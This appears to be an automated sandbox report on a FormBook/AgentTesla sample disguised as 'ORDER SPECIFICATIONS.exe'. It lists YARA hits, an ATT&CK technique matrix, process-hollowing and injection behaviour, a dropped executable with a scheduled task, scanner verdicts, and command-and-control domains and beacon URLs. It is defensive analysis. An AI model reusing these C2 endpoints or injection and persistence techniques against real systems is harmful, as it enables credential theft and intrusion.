            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery331Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356492 Sample: ORDER SPECIFICATIONS.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 43 www.shamansmoke.com 2->43 45 www.athomecp.com 2->45 47 2 other IPs or domains 2->47 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 14 other signatures 2->61 11 ORDER SPECIFICATIONS.exe 7 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\Roaming\LvZiFDk.exe, PE32 11->35 dropped 37 C:\Users\user\...\LvZiFDk.exe:Zone.Identifier, ASCII 11->37 dropped 39 C:\Users\user\AppData\Local\...\tmpDA15.tmp, XML 11->39 dropped 41 C:\Users\...\ORDER SPECIFICATIONS.exe.log, ASCII 11->41 dropped 65 Injects a PE file into a foreign processes 11->65 15 ORDER SPECIFICATIONS.exe 11->15         started        18 schtasks.exe 1 11->18         started        20 ORDER SPECIFICATIONS.exe 11->20         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 Queues an APC in another process (thread injection) 15->79 22 explorer.exe 15->22 injected 26 conhost.exe 18->26         started        process9 dnsIp10 49 www.athomecp.com 154.91.61.105, 80 VPSQUANUS Seychelles 22->49 51 abaplants.com 50.87.196.120, 49729, 80 UNIFIEDLAYER-AS-1US United States 22->51 53 15 other IPs or domains 22->53 63 System process connects to network (likely due to code injection or exploit) 22->63 28 chkdsk.exe 22->28         started        signatures11 process12 signatures13 67 Modifies the context of a thread in another process (thread injection) 28->67 69 Maps a DLL or memory area into another process 28->69 71 Tries to detect virtualization through RDTSC time measurements 28->71 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ORDER SPECIFICATIONS.exe31%VirustotalBrowse
            ORDER SPECIFICATIONS.exe15%ReversingLabsWin32.Trojan.AgentTesla
            ORDER SPECIFICATIONS.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\LvZiFDk.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\LvZiFDk.exe15%ReversingLabsWin32.Trojan.AgentTesla

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Micr0%Avira URL Cloudsafe
            http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src0%Avira URL Cloudsafe
            http://www.fontbureau.comaYn0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/dn0%Avira URL Cloudsafe
            http://schemas.microsoft.nh0%Avira URL Cloudsafe
            https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
            http://www.tiro.comBR0%Avira URL Cloudsafe
            https://www.casar.com/assunto/casamentos/decoracao-de-casamento/0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://www.casar.com/assunto/lua-de-mel-2/0%Avira URL Cloudsafe
            http://en.wX0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src0%Avira URL Cloudsafe
            www.athomecp.com/owws/0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            https://www.casar.com0%Avira URL Cloudsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src0%Avira URL Cloudsafe
            https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
